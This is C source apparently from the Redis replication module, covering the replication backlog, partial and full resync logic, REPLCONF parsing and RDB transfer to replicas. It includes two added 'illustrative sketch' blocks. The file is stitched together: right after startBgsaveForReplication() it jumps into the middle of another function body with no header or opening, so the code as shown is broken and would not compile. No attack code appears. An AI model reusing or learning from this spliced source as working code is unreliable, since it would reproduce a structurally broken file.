NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. */ #include "server.h" #include <sys/time.h> #include <unistd.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/stat.h> void replicationDiscardCachedMaster(void); void replicationResurrectCachedMaster(int newfd); void replicationSendAck(void); void putSlaveOnline(client *slave); int cancelReplicationHandshake(void); /* --------------------------- Utility functions ---------------------------- */ /* Return the pointer to a string representing the slave ip:listening_port * pair. Mostly useful for logging, since we want to log a slave using its * IP address and its listening port which is more clear for the user, for * example: "Closing connection with slave 10.1.2.3:6380". */ char *replicationGetSlaveName(client *c) { static char buf[NET_PEER_ID_LEN]; char ip[NET_IP_STR_LEN]; ip[0] = '\0'; buf[0] = '\0'; if (c->slave_ip[0] != '\0' || anetPeerToString(c->fd,ip,sizeof(ip),NULL) != -1) { /* Note that the 'ip' buffer is always larger than 'c->slave_ip' */ if (c->slave_ip[0] != '\0') memcpy(ip,c->slave_ip,sizeof(c->slave_ip)); if (c->slave_listening_port) anetFormatAddr(buf,sizeof(buf),ip,c->slave_listening_port); else snprintf(buf,sizeof(buf),"%s:<unknown-slave-port>",ip); } else { snprintf(buf,sizeof(buf),"client id #%llu", (unsigned long long) c->id); } return buf; } /* ---------------------------------- MASTER -------------------------------- */ void createReplicationBacklog(void) { serverAssert(server.repl_backlog == NULL); server.repl_backlog = zmalloc(server.repl_backlog_size); server.repl_backlog_histlen = 0; server.repl_backlog_idx = 0; /* We don't have any data inside our buffer, but virtually the first * byte we have is the next byte that will be generated for the * replication stream. */ server.repl_backlog_off = server.master_repl_offset+1; } /* This function is called when the user modifies the replication backlog * size at runtime. 
It is up to the function to both update the * server.repl_backlog_size and to resize the buffer and setup it so that * it contains the same data as the previous one (possibly less data, but * the most recent bytes, or the same data and more free space in case the * buffer is enlarged). */ void resizeReplicationBacklog(long long newsize) { if (newsize < CONFIG_REPL_BACKLOG_MIN_SIZE) newsize = CONFIG_REPL_BACKLOG_MIN_SIZE; if (server.repl_backlog_size == newsize) return; server.repl_backlog_size = newsize; if (server.repl_backlog != NULL) { /* What we actually do is to flush the old buffer and realloc a new * empty one. It will refill with new data incrementally. * The reason is that copying a few gigabytes adds latency and even * worse often we need to alloc additional space before freeing the * old buffer. */ zfree(server.repl_backlog); server.repl_backlog = zmalloc(server.repl_backlog_size); server.repl_backlog_histlen = 0; server.repl_backlog_idx = 0; /* Next byte we have is... the next since the buffer is empty. */ server.repl_backlog_off = server.master_repl_offset+1; } } void freeReplicationBacklog(void) { serverAssert(listLength(server.slaves) == 0); zfree(server.repl_backlog); server.repl_backlog = NULL; } /* Add data to the replication backlog. * This function also increments the global replication offset stored at * server.master_repl_offset, because there is no case where we want to feed * the backlog without incrementing the offset. */ void feedReplicationBacklog(void *ptr, size_t len) { unsigned char *p = ptr; server.master_repl_offset += len; /* This is a circular buffer, so write as much data we can at every * iteration and rewind the "idx" index if we reach the limit. */ while(len) { size_t thislen = server.repl_backlog_size - server.repl_backlog_idx; if (thislen > len) thislen = len; memcpy(server.repl_backlog+server.repl_backlog_idx,p,thislen); server.repl_backlog_idx += thislen; if (server.repl_backlog_idx == server.repl_backlog_size) server.repl_backlog_idx = 0; len -= thislen; p += thislen; server.repl_backlog_histlen += thislen; } if (server.repl_backlog_histlen > server.repl_backlog_size) server.repl_backlog_histlen = server.repl_backlog_size; /* Set the offset of the first byte we have in the backlog. */ server.repl_backlog_off = server.master_repl_offset - server.repl_backlog_histlen + 1; } /* Wrapper for feedReplicationBacklog() that takes Redis string objects * as input. */ void feedReplicationBacklogWithObject(robj *o) { char llstr[LONG_STR_SIZE]; void *p; size_t len; if (o->encoding == OBJ_ENCODING_INT) { len = ll2string(llstr,sizeof(llstr),(long)o->ptr); p = llstr; } else { len = sdslen(o->ptr); p = o->ptr; } feedReplicationBacklog(p,len); } /* Propagate write commands to slaves, and populate the replication backlog * as well. This function is used if the instance is a master: we use * the commands received by our clients in order to create the replication * stream. Instead if the instance is a slave and has sub-slaves attached, * we use replicationFeedSlavesFromMaster() */ void replicationFeedSlaves(list *slaves, int dictid, robj **argv, int argc) { listNode *ln; listIter li; int j, len; char llstr[LONG_STR_SIZE]; /* If the instance is not a top level master, return ASAP: we'll just proxy * the stream of data we receive from our master instead, in order to * propagate *identical* replication stream. 
In this way this slave can * advertise the same replication ID as the master (since it shares the * master replication history and has the same backlog and offsets). */ if (server.masterhost != NULL) return; /* If there aren't slaves, and there is no backlog buffer to populate, * we can return ASAP. */ if (server.repl_backlog == NULL && listLength(slaves) == 0) return; /* We can't have slaves attached and no backlog. */ serverAssert(!(listLength(slaves) != 0 && server.repl_backlog == NULL)); /* Send SELECT command to every slave if needed. */ if (server.slaveseldb != dictid) { robj *selectcmd; /* For a few DBs we have pre-computed SELECT command. */ if (dictid >= 0 && dictid < PROTO_SHARED_SELECT_CMDS) { selectcmd = shared.select[dictid]; } else { int dictid_len; dictid_len = ll2string(llstr,sizeof(llstr),dictid); selectcmd = createObject(OBJ_STRING, sdscatprintf(sdsempty(), "*2\r\n$6\r\nSELECT\r\n$%d\r\n%s\r\n", dictid_len, llstr)); } /* Add the SELECT command into the backlog. */ if (server.repl_backlog) feedReplicationBacklogWithObject(selectcmd); /* Send it to slaves. */ listRewind(slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) continue; addReply(slave,selectcmd); } if (dictid < 0 || dictid >= PROTO_SHARED_SELECT_CMDS) decrRefCount(selectcmd); } server.slaveseldb = dictid; /* Write the command to the replication backlog if any. */ if (server.repl_backlog) { char aux[LONG_STR_SIZE+3]; /* Add the multi bulk reply length. */ aux[0] = '*'; len = ll2string(aux+1,sizeof(aux)-1,argc); aux[len+1] = '\r'; aux[len+2] = '\n'; feedReplicationBacklog(aux,len+3); for (j = 0; j < argc; j++) { long objlen = stringObjectLen(argv[j]); /* We need to feed the buffer with the object as a bulk reply * not just as a plain string, so create the $..CRLF payload len * and add the final CRLF */ aux[0] = '$'; len = ll2string(aux+1,sizeof(aux)-1,objlen); aux[len+1] = '\r'; aux[len+2] = '\n'; feedReplicationBacklog(aux,len+3); feedReplicationBacklogWithObject(argv[j]); feedReplicationBacklog(aux+len+1,2); } } /* Write the command to every slave. */ listRewind(slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; /* Don't feed slaves that are still waiting for BGSAVE to start */ if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) continue; /* Feed slaves that are waiting for the initial SYNC (so these commands * are queued in the output buffer until the initial SYNC completes), * or are already in sync with the master. */ /* Add the multi bulk length. */ addReplyMultiBulkLen(slave,argc); /* Finally any additional argument that was not stored inside the * static buffer if any (from j to argc). */ for (j = 0; j < argc; j++) addReplyBulk(slave,argv[j]); } } /* This function is used in order to proxy what we receive from our master * to our sub-slaves. */ #include <ctype.h> void replicationFeedSlavesFromMasterStream(list *slaves, char *buf, size_t buflen) { listNode *ln; listIter li; /* Debugging: this is handy to see the stream sent from master * to slaves. Disabled with if(0). */ if (0) { printf("%zu:",buflen); for (size_t j = 0; j < buflen; j++) { printf("%c", isprint(buf[j]) ? 
buf[j] : '.'); } printf("\n"); } if (server.repl_backlog) feedReplicationBacklog(buf,buflen); listRewind(slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; /* Don't feed slaves that are still waiting for BGSAVE to start */ if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) continue; addReplyString(slave,buf,buflen); } } void replicationFeedMonitors(client *c, list *monitors, int dictid, robj **argv, int argc) { listNode *ln; listIter li; int j; sds cmdrepr = sdsnew("+"); robj *cmdobj; struct timeval tv; gettimeofday(&tv,NULL); cmdrepr = sdscatprintf(cmdrepr,"%ld.%06ld ",(long)tv.tv_sec,(long)tv.tv_usec); if (c->flags & CLIENT_LUA) { cmdrepr = sdscatprintf(cmdrepr,"[%d lua] ",dictid); } else if (c->flags & CLIENT_UNIX_SOCKET) { cmdrepr = sdscatprintf(cmdrepr,"[%d unix:%s] ",dictid,server.unixsocket); } else { cmdrepr = sdscatprintf(cmdrepr,"[%d %s] ",dictid,getClientPeerId(c)); } for (j = 0; j < argc; j++) { if (argv[j]->encoding == OBJ_ENCODING_INT) { cmdrepr = sdscatprintf(cmdrepr, "\"%ld\"", (long)argv[j]->ptr); } else { cmdrepr = sdscatrepr(cmdrepr,(char*)argv[j]->ptr, sdslen(argv[j]->ptr)); } if (j != argc-1) cmdrepr = sdscatlen(cmdrepr," ",1); } cmdrepr = sdscatlen(cmdrepr,"\r\n",2); cmdobj = createObject(OBJ_STRING,cmdrepr); listRewind(monitors,&li); while((ln = listNext(&li))) { client *monitor = ln->value; addReply(monitor,cmdobj); } decrRefCount(cmdobj); } /* Feed the slave 'c' with the replication backlog starting from the * specified 'offset' up to the end of the backlog. */ long long addReplyReplicationBacklog(client *c, long long offset) { long long j, skip, len; serverLog(LL_DEBUG, "[PSYNC] Slave request offset: %lld", offset); if (server.repl_backlog_histlen == 0) { serverLog(LL_DEBUG, "[PSYNC] Backlog history len is zero"); return 0; } serverLog(LL_DEBUG, "[PSYNC] Backlog size: %lld", server.repl_backlog_size); serverLog(LL_DEBUG, "[PSYNC] First byte: %lld", server.repl_backlog_off); serverLog(LL_DEBUG, "[PSYNC] History len: %lld", server.repl_backlog_histlen); serverLog(LL_DEBUG, "[PSYNC] Current index: %lld", server.repl_backlog_idx); /* Compute the amount of bytes we need to discard. */ skip = offset - server.repl_backlog_off; serverLog(LL_DEBUG, "[PSYNC] Skipping: %lld", skip); /* Point j to the oldest byte, that is actually our * server.repl_backlog_off byte. */ j = (server.repl_backlog_idx + (server.repl_backlog_size-server.repl_backlog_histlen)) % server.repl_backlog_size; serverLog(LL_DEBUG, "[PSYNC] Index of first byte: %lld", j); /* Discard the amount of data to seek to the specified 'offset'. */ j = (j + skip) % server.repl_backlog_size; /* Feed slave with data. Since it is a circular buffer we have to * split the reply in two parts if we are cross-boundary. */ len = server.repl_backlog_histlen - skip; serverLog(LL_DEBUG, "[PSYNC] Reply total length: %lld", len); while(len) { long long thislen = ((server.repl_backlog_size - j) < len) ? (server.repl_backlog_size - j) : len; serverLog(LL_DEBUG, "[PSYNC] addReply() length: %lld", thislen); addReplySds(c,sdsnewlen(server.repl_backlog + j, thislen)); len -= thislen; j = 0; } return server.repl_backlog_histlen - skip; } /* Return the offset to provide as reply to the PSYNC command received * from the slave. The returned value is only valid immediately after * the BGSAVE process started and before executing any other command * from clients. 
*/ long long getPsyncInitialOffset(void) { return server.master_repl_offset; } /* Send a FULLRESYNC reply in the specific case of a full resynchronization, * as a side effect setup the slave for a full sync in different ways: * * 1) Remember, into the slave client structure, the replication offset * we sent here, so that if new slaves will later attach to the same * background RDB saving process (by duplicating this client output * buffer), we can get the right offset from this slave. * 2) Set the replication state of the slave to WAIT_BGSAVE_END so that * we start accumulating differences from this point. * 3) Force the replication stream to re-emit a SELECT statement so * the new slave incremental differences will start selecting the * right database number. * * Normally this function should be called immediately after a successful * BGSAVE for replication was started, or when there is one already in * progress that we attached our slave to. */ int replicationSetupSlaveForFullResync(client *slave, long long offset) { char buf[128]; int buflen; slave->psync_initial_offset = offset; slave->replstate = SLAVE_STATE_WAIT_BGSAVE_END; /* We are going to accumulate the incremental changes for this * slave as well. Set slaveseldb to -1 in order to force to re-emit * a SELECT statement in the replication stream. */ server.slaveseldb = -1; /* Don't send this reply to slaves that approached us with * the old SYNC command. */ if (!(slave->flags & CLIENT_PRE_PSYNC)) { buflen = snprintf(buf,sizeof(buf),"+FULLRESYNC %s %lld\r\n", server.replid,offset); if (write(slave->fd,buf,buflen) != buflen) { freeClientAsync(slave); return C_ERR; } } return C_OK; } /* This function handles the PSYNC command from the point of view of a * master receiving a request for partial resynchronization. * * On success return C_OK, otherwise C_ERR is returned and we proceed * with the usual full resync. */ int masterTryPartialResynchronization(client *c) { long long psync_offset, psync_len; char *master_replid = c->argv[1]->ptr; char buf[128]; int buflen; /* Parse the replication offset asked by the slave. Go to full sync * on parse error: this should never happen but we try to handle * it in a robust way compared to aborting. */ if (getLongLongFromObjectOrReply(c,c->argv[2],&psync_offset,NULL) != C_OK) goto need_full_resync; /* Is the replication ID of this master the same advertised by the wannabe * slave via PSYNC? If the replication ID changed this master has a * different replication history, and there is no way to continue. * * Note that there are two potentially valid replication IDs: the ID1 * and the ID2. The ID2 however is only valid up to a specific offset. */ if (strcasecmp(master_replid, server.replid) && (strcasecmp(master_replid, server.replid2) || psync_offset > server.second_replid_offset)) { /* Run id "?" is used by slaves that want to force a full resync. 
*/
        if (master_replid[0] != '?') {
            if (strcasecmp(master_replid, server.replid) &&
                strcasecmp(master_replid, server.replid2))
            {
                serverLog(LL_NOTICE,"Partial resynchronization not accepted: "
                    "Replication ID mismatch (Slave asked for '%s', my "
                    "replication IDs are '%s' and '%s')",
                    master_replid, server.replid, server.replid2);
            } else {
                serverLog(LL_NOTICE,"Partial resynchronization not accepted: "
                    "Requested offset for second ID was %lld, but I can reply "
                    "up to %lld", psync_offset, server.second_replid_offset);
            }
        } else {
            serverLog(LL_NOTICE,"Full resync requested by slave %s",
                replicationGetSlaveName(c));
        }
        goto need_full_resync;
    }

    /* Do we still have the data our slave is asking for? */
    if (!server.repl_backlog ||
        psync_offset < server.repl_backlog_off ||
        psync_offset > (server.repl_backlog_off + server.repl_backlog_histlen))
    {
        serverLog(LL_NOTICE,
            "Unable to partial resync with slave %s for lack of backlog (Slave request was: %lld).", replicationGetSlaveName(c), psync_offset);
        if (psync_offset > server.master_repl_offset) {
            serverLog(LL_WARNING,
                "Warning: slave %s tried to PSYNC with an offset that is greater than the master replication offset.", replicationGetSlaveName(c));
        }
        goto need_full_resync;
    }

    /* If we reached this point, we are able to perform a partial resync:
     * 1) Set client state to make it a slave.
     * 2) Inform the client we can continue with +CONTINUE
     * 3) Send the backlog data (from the offset to the end) to the slave. */
    c->flags |= CLIENT_SLAVE;
    c->replstate = SLAVE_STATE_ONLINE;
    c->repl_ack_time = server.unixtime;
    c->repl_put_online_on_ack = 0;
    listAddNodeTail(server.slaves,c);
    /* We can't use the connection buffers since they are used to accumulate
     * new commands at this stage. But we are sure the socket send buffer is
     * empty so this write will never fail actually. */
    if (c->slave_capa & SLAVE_CAPA_PSYNC2) {
        buflen = snprintf(buf,sizeof(buf),"+CONTINUE %s\r\n", server.replid);
    } else {
        buflen = snprintf(buf,sizeof(buf),"+CONTINUE\r\n");
    }
    if (write(c->fd,buf,buflen) != buflen) {
        freeClientAsync(c);
        return C_OK;
    }
    psync_len = addReplyReplicationBacklog(c,psync_offset);
    serverLog(LL_NOTICE,
        "Partial resynchronization request from %s accepted. Sending %lld bytes of backlog starting from offset %lld.",
            replicationGetSlaveName(c),
            psync_len, psync_offset);
    /* Note that we don't need to set the selected DB at server.slaveseldb
     * to -1 to force the master to emit SELECT, since the slave already
     * has this state from the previous connection with the master. */

    refreshGoodSlavesCount();
    return C_OK; /* The caller can return, no full resync needed. */

need_full_resync:
    /* We need a full resync for some reason... Note that we can't
     * reply to PSYNC right now if a full SYNC is needed. The reply
     * must include the master offset at the time the RDB file we transfer
     * is generated, so we need to delay the reply to that moment. */
    return C_ERR;
}
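/* Illustrative sketch (not part of Redis): the two conditions that
 * masterTryPartialResynchronization() checks above, condensed into a single
 * predicate. 'canPartialResync' is a hypothetical name; the fields mirror
 * the server globals used in this file. */
#ifdef SKETCH_ONLY
int canPartialResync(const char *master_replid, long long psync_offset) {
    /* History check: the asked ID must be our current ID, or our previous
     * ID (replid2) with an offset not past the point where history forked. */
    int history_ok =
        (strcasecmp(master_replid, server.replid) == 0) ||
        (strcasecmp(master_replid, server.replid2) == 0 &&
         psync_offset <= server.second_replid_offset);

    /* Backlog check: the requested offset must still be inside the window
     * [repl_backlog_off, repl_backlog_off+repl_backlog_histlen]. */
    int backlog_ok =
        server.repl_backlog != NULL &&
        psync_offset >= server.repl_backlog_off &&
        psync_offset <= (server.repl_backlog_off + server.repl_backlog_histlen);

    return history_ok && backlog_ok;
}
#endif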
/* Start a BGSAVE for replication goals, that is, selecting the disk or
 * socket target depending on the configuration, and making sure that
 * the script cache is flushed before starting.
 *
 * The mincapa argument is the bitwise AND among all the slaves capabilities
 * of the slaves waiting for this BGSAVE, so represents the slave capabilities
 * all the slaves support. Can be tested via SLAVE_CAPA_* macros.
 *
 * Side effects, other than starting a BGSAVE:
 *
 * 1) Handle the slaves in WAIT_START state, by preparing them for a full
 *    sync if the BGSAVE was successfully started, or sending them an error
 *    and dropping them from the list of slaves.
 *
 * 2) Flush the Lua scripting script cache if the BGSAVE was actually
 *    started.
 *
 * Returns C_OK on success or C_ERR otherwise. */
int startBgsaveForReplication(int mincapa) {
    int retval;
    int socket_target = server.repl_diskless_sync && (mincapa & SLAVE_CAPA_EOF);
    listIter li;
    listNode *ln;

    serverLog(LL_NOTICE,"Starting BGSAVE for SYNC with target: %s",
        socket_target ? "slaves sockets" : "disk");

    rdbSaveInfo rsi, *rsiptr;
    rsiptr = rdbPopulateSaveInfo(&rsi);
    /* Only do rdbSave* when rsiptr is not NULL,
     * otherwise slave will miss repl-stream-db. */
    if (rsiptr) {
        if (socket_target)
            retval = rdbSaveToSlavesSockets(rsiptr);
        else
            retval = rdbSaveBackground(server.rdb_filename,rsiptr);
    } else {
        serverLog(LL_WARNING,"BGSAVE for replication: replication information not available, can't generate the RDB file right now. Try later.");
        retval = C_ERR;
    }

    /* If we failed to BGSAVE, remove the slaves waiting for a full
     * resynchronization from the list of slaves, inform them with
     * an error about what happened, and close the connection ASAP. */
    if (retval == C_ERR) {
        serverLog(LL_WARNING,"BGSAVE for replication failed");
        listRewind(server.slaves,&li);
        while((ln = listNext(&li))) {
            client *slave = ln->value;

            if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) {
                slave->flags &= ~CLIENT_SLAVE;
                listDelNode(server.slaves,ln);
                addReplyError(slave,
                    "BGSAVE failed, replication can't continue");
                slave->flags |= CLIENT_CLOSE_AFTER_REPLY;
            }
        }
        return retval;
    }

    /* If the target is socket, rdbSaveToSlavesSockets() already setup
     * the slaves for a full resync. Otherwise for disk target do it now. */
    if (!socket_target) {
        listRewind(server.slaves,&li);
        while((ln = listNext(&li))) {
            client *slave = ln->value;

            if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) {
                    replicationSetupSlaveForFullResync(slave,
                            getPsyncInitialOffset());
            }
        }
    }

    /* Flush the script cache, since we need slave differences to be
     * accumulated without requiring slaves to match our cached scripts. */
    if (retval == C_OK) replicationScriptCacheFlush();
    return retval;
}
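/* Illustrative sketch (not part of Redis): how the 'mincapa' argument
 * described above can be computed, i.e. the bitwise AND of the capabilities
 * of every slave still waiting for the BGSAVE to start. 'computeMinCapa' is
 * a hypothetical helper name. */
#ifdef SKETCH_ONLY
int computeMinCapa(void) {
    listIter li;
    listNode *ln;
    int mincapa = -1; /* All bits set: identity for bitwise AND. */

    listRewind(server.slaves,&li);
    while((ln = listNext(&li))) {
        client *slave = ln->value;
        if (slave->replstate != SLAVE_STATE_WAIT_BGSAVE_START) continue;
        mincapa = (mincapa == -1) ? slave->slave_capa
                                  : (mincapa & slave->slave_capa);
    }
    return mincapa;
}
#endif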
        } else {
            char *master_replid = c->argv[1]->ptr;

            /* Increment stats for failed PSYNCs, but only if the
             * replid is not "?", as this is used by slaves to force a full
             * resync on purpose when they are not able to partially
             * resync. */
            if (master_replid[0] != '?') server.stat_sync_partial_err++;
        }
    } else {
        /* If a slave uses SYNC, we are dealing with an old implementation
         * of the replication protocol (like redis-cli --slave). Flag the
         * client so that we don't expect to receive REPLCONF ACK feedbacks. */
        c->flags |= CLIENT_PRE_PSYNC;
    }

    /* Full resynchronization. */
    server.stat_sync_full++;

    /* Setup the slave as one waiting for BGSAVE to start. The following code
     * paths will change the state if we handle the slave differently. */
    c->replstate = SLAVE_STATE_WAIT_BGSAVE_START;
    if (server.repl_disable_tcp_nodelay)
        anetDisableTcpNoDelay(NULL, c->fd); /* Non critical if it fails. */
    c->repldbfd = -1;
    c->flags |= CLIENT_SLAVE;
    listAddNodeTail(server.slaves,c);

    /* Create the replication backlog if needed. */
    if (listLength(server.slaves) == 1 && server.repl_backlog == NULL) {
        /* When we create the backlog from scratch, we always use a new
         * replication ID and clear the ID2, since there is no valid
         * past history. */
        changeReplicationId();
        clearReplicationId2();
        createReplicationBacklog();
    }

    /* CASE 1: BGSAVE is in progress, with disk target. */
    if (server.rdb_child_pid != -1 &&
        server.rdb_child_type == RDB_CHILD_TYPE_DISK)
    {
        /* Ok, a background save is in progress. Let's check if it is a good
         * one for replication, i.e. if there is another slave that is
         * registering differences since the server forked to save. */
        client *slave;
        listNode *ln;
        listIter li;

        listRewind(server.slaves,&li);
        while((ln = listNext(&li))) {
            slave = ln->value;
            if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_END) break;
        }
        /* To attach this slave, we check that it has at least all the
         * capabilities of the slave that triggered the current BGSAVE. */
        if (ln && ((c->slave_capa & slave->slave_capa) == slave->slave_capa)) {
            /* Perfect, the server is already registering differences for
             * another slave. Set the right state, and copy the buffer. */
            copyClientOutputBuffer(c,slave);
            replicationSetupSlaveForFullResync(c,slave->psync_initial_offset);
            serverLog(LL_NOTICE,"Waiting for end of BGSAVE for SYNC");
        } else {
            /* No way, we need to wait for the next BGSAVE in order to
             * register differences. */
            serverLog(LL_NOTICE,"Can't attach the slave to the current BGSAVE. Waiting for next BGSAVE for SYNC");
        }

    /* CASE 2: BGSAVE is in progress, with socket target. */
    } else if (server.rdb_child_pid != -1 &&
               server.rdb_child_type == RDB_CHILD_TYPE_SOCKET)
    {
        /* There is an RDB child process but it is writing directly to
         * children sockets. We need to wait for the next BGSAVE
         * in order to synchronize. */
        serverLog(LL_NOTICE,"Current BGSAVE has socket target. Waiting for next BGSAVE for SYNC");

    /* CASE 3: There is no BGSAVE in progress. */
    } else {
        if (server.repl_diskless_sync && (c->slave_capa & SLAVE_CAPA_EOF)) {
            /* Diskless replication RDB child is created inside
             * replicationCron() since we want to delay its start a
             * few seconds to wait for more slaves to arrive. */
            if (server.repl_diskless_sync_delay)
                serverLog(LL_NOTICE,"Delay next BGSAVE for diskless SYNC");
        } else {
            /* Target is disk (or the slave is not capable of supporting
             * diskless replication) and we don't have a BGSAVE in progress,
             * let's start one. */
            if (server.aof_child_pid == -1) {
                startBgsaveForReplication(c->slave_capa);
            } else {
                serverLog(LL_NOTICE,
                    "No BGSAVE in progress, but an AOF rewrite is active. "
                    "BGSAVE for replication delayed");
            }
        }
    }
    return;
}

/* REPLCONF <option> <value> <option> <value> ...
 * This command is used by a slave in order to configure the replication
 * process before starting it with the SYNC command.
 *
 * Currently the only use of this command is to communicate to the master
 * the listening port of the slave Redis instance, so that the
 * master can accurately list slaves and their listening ports in
 * the INFO output.
 *
 * In the future the same command can be used in order to configure
 * the replication to initiate an incremental replication instead of a
 * full resync. */
void replconfCommand(client *c) {
    int j;

    if ((c->argc % 2) == 0) {
        /* Number of arguments must be odd to make sure that every
         * option has a corresponding value. */
        addReply(c,shared.syntaxerr);
        return;
    }

    /* Process every option-value pair. */
    for (j = 1; j < c->argc; j+=2) {
        if (!strcasecmp(c->argv[j]->ptr,"listening-port")) {
            long port;

            if ((getLongFromObjectOrReply(c,c->argv[j+1],
                    &port,NULL) != C_OK))
                return;
            c->slave_listening_port = port;
        } else if (!strcasecmp(c->argv[j]->ptr,"ip-address")) {
            sds ip = c->argv[j+1]->ptr;
            if (sdslen(ip) < sizeof(c->slave_ip)) {
                memcpy(c->slave_ip,ip,sdslen(ip)+1);
            } else {
                addReplyErrorFormat(c,"REPLCONF ip-address provided by "
                    "slave instance is too long: %zd bytes", sdslen(ip));
                return;
            }
        } else if (!strcasecmp(c->argv[j]->ptr,"capa")) {
            /* Ignore capabilities not understood by this master. */
            if (!strcasecmp(c->argv[j+1]->ptr,"eof"))
                c->slave_capa |= SLAVE_CAPA_EOF;
            else if (!strcasecmp(c->argv[j+1]->ptr,"psync2"))
                c->slave_capa |= SLAVE_CAPA_PSYNC2;
        } else if (!strcasecmp(c->argv[j]->ptr,"ack")) {
            /* REPLCONF ACK is used by the slave to inform the master of the
             * amount of replication stream that it processed so far. It is an
             * internal only command that normal clients should never use. */
            long long offset;

            if (!(c->flags & CLIENT_SLAVE)) return;
            if ((getLongLongFromObject(c->argv[j+1], &offset) != C_OK))
                return;
            if (offset > c->repl_ack_off)
                c->repl_ack_off = offset;
            c->repl_ack_time = server.unixtime;
            /* If this was a diskless replication, we need to really put
             * the slave online when the first ACK is received (which
             * confirms the slave is online and ready to get more data). */
            if (c->repl_put_online_on_ack && c->replstate == SLAVE_STATE_ONLINE)
                putSlaveOnline(c);
            /* Note: this command does not reply anything! */
            return;
        } else if (!strcasecmp(c->argv[j]->ptr,"getack")) {
            /* REPLCONF GETACK is used in order to request an ACK ASAP
             * from the slave. */
            if (server.masterhost && server.master) replicationSendAck();
            return;
        } else {
            addReplyErrorFormat(c,"Unrecognized REPLCONF option: %s",
                (char*)c->argv[j]->ptr);
            return;
        }
    }
    addReply(c,shared.ok);
}

/* This function puts a slave in the online state, and should be called just
 * after a slave received the RDB file for the initial synchronization, and
 * we are finally ready to send the incremental stream of commands.
 *
 * It does a few things:
 *
 * 1) Put the slave in ONLINE state (useless when the function is called
 *    because the state is already ONLINE but repl_put_online_on_ack is true).
 * 2) Make sure the writable event is re-installed, since calling the SYNC
 *    command disables it, so that we can accumulate output buffer without
 *    sending it to the slave.
 * 3) Update the count of good slaves.
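 *
 * For reference, the call sites in this file are: sendBulkToSlave(), which
 * invokes this function right after writing the last byte of the RDB to the
 * slave socket (disk-backed transfer), and replconfCommand(), which invokes
 * it when the first REPLCONF ACK arrives after a diskless transfer.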
 */
void putSlaveOnline(client *slave) {
    slave->replstate = SLAVE_STATE_ONLINE;
    slave->repl_put_online_on_ack = 0;
    slave->repl_ack_time = server.unixtime; /* Prevent false timeout. */
    if (aeCreateFileEvent(server.el, slave->fd, AE_WRITABLE,
        sendReplyToClient, slave) == AE_ERR) {
        serverLog(LL_WARNING,"Unable to register writable event for slave bulk transfer: %s", strerror(errno));
        freeClient(slave);
        return;
    }
    refreshGoodSlavesCount();
    serverLog(LL_NOTICE,"Synchronization with slave %s succeeded",
        replicationGetSlaveName(slave));
}

void sendBulkToSlave(aeEventLoop *el, int fd, void *privdata, int mask) {
    client *slave = privdata;
    UNUSED(el);
    UNUSED(mask);
    char buf[PROTO_IOBUF_LEN];
    ssize_t nwritten, buflen;

    /* Before sending the RDB file, we send the preamble as configured by the
     * replication process. Currently the preamble is just the bulk count of
     * the file in the form "$<length>\r\n". */
    if (slave->replpreamble) {
        nwritten = write(fd,slave->replpreamble,sdslen(slave->replpreamble));
        if (nwritten == -1) {
            serverLog(LL_VERBOSE,"Write error sending RDB preamble to slave: %s",
                strerror(errno));
            freeClient(slave);
            return;
        }
        server.stat_net_output_bytes += nwritten;
        sdsrange(slave->replpreamble,nwritten,-1);
        if (sdslen(slave->replpreamble) == 0) {
            sdsfree(slave->replpreamble);
            slave->replpreamble = NULL;
            /* fall through sending data. */
        } else {
            return;
        }
    }

    /* If the preamble was already transferred, send the RDB bulk data. */
    lseek(slave->repldbfd,slave->repldboff,SEEK_SET);
    buflen = read(slave->repldbfd,buf,PROTO_IOBUF_LEN);
    if (buflen <= 0) {
        serverLog(LL_WARNING,"Read error sending DB to slave: %s",
            (buflen == 0) ? "premature EOF" : strerror(errno));
        freeClient(slave);
        return;
    }
    if ((nwritten = write(fd,buf,buflen)) == -1) {
        if (errno != EAGAIN) {
            serverLog(LL_WARNING,"Write error sending DB to slave: %s",
                strerror(errno));
            freeClient(slave);
        }
        return;
    }
    slave->repldboff += nwritten;
    server.stat_net_output_bytes += nwritten;
    if (slave->repldboff == slave->repldbsize) {
        close(slave->repldbfd);
        slave->repldbfd = -1;
        aeDeleteFileEvent(server.el,slave->fd,AE_WRITABLE);
        putSlaveOnline(slave);
    }
}

/* This function is called at the end of every background saving,
 * or when the replication RDB transfer strategy is modified from
 * disk to socket or the other way around.
 *
 * The goal of this function is to handle slaves waiting for a successful
 * background saving in order to perform non-blocking synchronization, and
 * to schedule a new BGSAVE if there are slaves that attached while a
 * BGSAVE was in progress, but it was not a good one for replication (no
 * other slave was accumulating differences).
 *
 * The argument bgsaveerr is C_OK if the background saving succeeded,
 * otherwise C_ERR is passed to the function.
 * The 'type' argument is the type of the child that terminated
 * (if it had a disk or socket target). */
void updateSlavesWaitingBgsave(int bgsaveerr, int type) {
    listNode *ln;
    int startbgsave = 0;
    int mincapa = -1;
    listIter li;

    listRewind(server.slaves,&li);
    while((ln = listNext(&li))) {
        client *slave = ln->value;

        if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) {
            startbgsave = 1;
            mincapa = (mincapa == -1) ? slave->slave_capa :
                                        (mincapa & slave->slave_capa);
        } else if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_END) {
            struct redis_stat buf;

            /* If this was an RDB on disk save, we have to prepare to send
             * the RDB from disk to the slave socket.
             * Otherwise if this was already an RDB -> slave sockets transfer,
             * used in the case of diskless replication, our work is trivial:
             * we can just put the slave online. */
            if (type == RDB_CHILD_TYPE_SOCKET) {
                serverLog(LL_NOTICE,
                    "Streamed RDB transfer with slave %s succeeded (socket). Waiting for REPLCONF ACK from slave to enable streaming",
                        replicationGetSlaveName(slave));
                /* Note: we wait for a REPLCONF ACK message from the slave in
                 * order to really put it online (install the write handler
                 * so that the accumulated data can be transferred). However
                 * we change the replication state ASAP, since our slave
                 * is technically online now. */
